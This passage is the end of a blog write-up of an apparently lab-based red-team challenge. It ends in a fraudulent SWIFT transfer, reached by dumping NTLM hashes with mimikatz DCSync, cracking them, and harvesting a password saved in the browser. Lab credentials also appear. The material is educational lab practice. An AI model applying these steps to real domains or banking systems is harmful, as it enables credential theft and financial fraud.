Destination Password:	pKLuBT5vhbh7-w
Destination AccountID:	65c82463599a22214d185b32
Destination Funds:	$ 10
===============================================

Using these details, perform the following steps:
1. Go to the SWIFT web application
2. Navigate to the Make a Transaction page
3. Issue a transfer using the Source account as Sender and the Destination account as Receiver. You will have to use the corresponding account IDs.
4. Issue the transfer for the full 10 million dollars
5. Once completed, request verification of your transaction here (No need to check your email once the transfer has been created).

We can log in with the credentials provided to us and make the transaction.

We received a PIN in our email and using it we can confirm that our transaction was initiated.

We get further instructions in our email which state that we need to compromise a capturer's and an approver's account, log in with each account in turn, and complete the transaction. So to break it down further:

  • We need a user account from Capturers group
  • We need to log in with this account and capture the transaction
  • We also need to get a user account from Approvers group
  • We then need to log in as approver and complete the transaction to achieve the goal

Let’s connect to BANKDC via RDP and enumerate the user groups.

We notice that there are two groups that we are interested in. We can check out the users in each group. We don't need to compromise all the accounts, just one account from each group, to complete the task.

We can use mimikatz and perform a DCSync attack to dump the NTLM hashes for the users in both groups. We already had the file on the ROOTDC machine.

We can download mimikatz from the ROOTDC machine to BANKDC.

We can grab the hashes for each user now.

We tried cracking the hashes offline and were successful.

We noticed that the hashes for the c.young and a.holt users were the same, so both users have the same password. This could be intentional, or other users working on the lab at the same time (since this is a shared environment) might have changed the passwords for these users. Changing the passwords ourselves seems easy, but it is not recommended.

We can log in as c.young and forward our transaction.

Next, we need to log in as a.holt user and approve the transaction. But for some reason, the credentials won’t work. We will connect to the JMP machine via RDP and use a.holt’s AD credentials. After logging in we can see there is a note that clarifies why AD credentials did not work for a.holt on the bank login page.

The approvers' application credentials are not the same as their AD credentials.

Upon further enumerating, we notice that when trying to log in to the bank application using Google Chrome, the username and password fields get auto-filled! On checking the Settings in the browser, we see that credentials are saved for the site! We can log in now and approve the transaction.

Approving the transaction confirms that we have successfully achieved the goal for this challenge! Not only have we compromised the entire AD Forest with three Domain Controllers, but we have also made a fraudulent transaction to show the further impact of the compromise.

Conclusion

Phew! This has been a wild ride. This was the best Red Teaming lab I've worked on so far. Thanks to TryHackMe for this opportunity to practice our red teaming skills. Apart from some frustrating moments (mostly due to other users changing or deleting the accounts and passwords), I have thoroughly enjoyed working on this assignment.

In this blog, I have only included the direct path with the least number of steps needed to complete the challenge. There are other attack vectors, and maybe even an easier way to complete the task. Feel free to ask if you have any questions or need any help with this lab.